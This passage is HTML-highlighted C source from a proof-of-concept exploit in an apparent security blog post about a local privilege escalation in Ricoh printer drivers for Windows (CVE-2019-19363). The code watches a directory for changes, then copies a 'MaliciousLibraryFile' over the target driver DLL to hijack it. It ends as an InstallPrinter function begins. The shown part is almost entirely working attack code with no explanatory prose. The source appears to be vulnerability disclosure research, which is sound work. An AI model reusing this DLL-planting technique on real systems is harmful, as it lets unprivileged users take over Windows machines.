&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-74"&gt;&lt;code data-line-number=" 74"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-74" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-74"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="n"&gt;change_counter&lt;/span&gt;&lt;span class="o"&gt;--&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-75"&gt;&lt;code data-line-number=" 75"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-75" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-75"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-76"&gt;&lt;code data-line-number=" 76"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-76" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-76"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CopyFile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;MaliciousLibraryFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-77"&gt;&lt;code data-line-number=" 77"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-77" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-77"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ File %s copied to %s.&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MaliciousLibraryFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-78"&gt;&lt;code data-line-number=" 78"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-78" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-78"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-79"&gt;&lt;code data-line-number=" 79"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-79" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-79"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-80"&gt;&lt;code data-line-number=" 80"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-80" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-80"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                &lt;/span&gt;&lt;span class="kt"&gt;wchar_t&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-81"&gt;&lt;code data-line-number=" 81"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-81" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-81"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-82"&gt;&lt;code data-line-number=" 82"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-82" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-82"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                &lt;/span&gt;&lt;span class="n"&gt;FormatMessageW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;FORMAT_MESSAGE_FROM_SYSTEM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;FORMAT_MESSAGE_IGNORE_INSERTS&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-83"&gt;&lt;code data-line-number=" 83"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-83" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-83"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                        &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;GetLastError&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MAKELANGID&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LANG_NEUTRAL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SUBLANG_DEFAULT&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-84"&gt;&lt;code data-line-number=" 84"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-84" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-84"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                        &lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;wchar_t&lt;/span&gt;&lt;span class="p"&gt;)),&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-85"&gt;&lt;code data-line-number=" 85"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-85" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-85"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-86"&gt;&lt;code data-line-number=" 86"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-86" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-86"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Failed to copy file %s to %s: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MaliciousLibraryFile&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TargetDllFullFilePath&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-87"&gt;&lt;code data-line-number=" 87"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-87" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-87"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-88"&gt;&lt;code data-line-number=" 88"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-88" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-88"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-89"&gt;&lt;code data-line-number=" 89"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-89" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-89"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                        &lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-90"&gt;&lt;code data-line-number=" 90"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-90" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-90"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                                &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// end of trigger part&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-91"&gt;&lt;code data-line-number=" 91"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-91" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-91"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-92"&gt;&lt;code data-line-number=" 92"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-92" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-92"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// eo action mod&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-93"&gt;&lt;code data-line-number=" 93"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-93" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-93"&gt;&lt;/a&gt;&lt;span class="w"&gt;                                &lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;PFILE_NOTIFY_INFORMATION&lt;/span&gt;&lt;span class="p"&gt;)((&lt;/span&gt;&lt;span class="n"&gt;LPBYTE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;fni&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cbOffset&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-94"&gt;&lt;code data-line-number=" 94"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-94" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-94"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-95"&gt;&lt;code data-line-number=" 95"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-95" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-95"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;while&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cbOffset&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-96"&gt;&lt;code data-line-number=" 96"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-96" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-96"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-97"&gt;&lt;code data-line-number=" 97"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-97" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-97"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="c1"&gt;// Reissue the watch command&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-98"&gt;&lt;code data-line-number=" 98"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-98" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-98"&gt;&lt;/a&gt;&lt;span class="w"&gt;                        &lt;/span&gt;&lt;span class="n"&gt;ReadDirectoryChangesW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;lpBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MAX_BUFFER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TRUE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;dwNotifyFilter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;dwBufLength&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;Overlapped&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-99"&gt;&lt;code data-line-number=" 99"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-99" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-99"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-100"&gt;&lt;code data-line-number="100"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-100" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-100"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;while&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;di&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-101"&gt;&lt;code data-line-number="101"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-101" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-101"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-102"&gt;&lt;code data-line-number="102"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-102" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-102"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-103"&gt;&lt;code data-line-number="103"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-103" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-103"&gt;&lt;/a&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WINAPI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;InstallPrinter&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
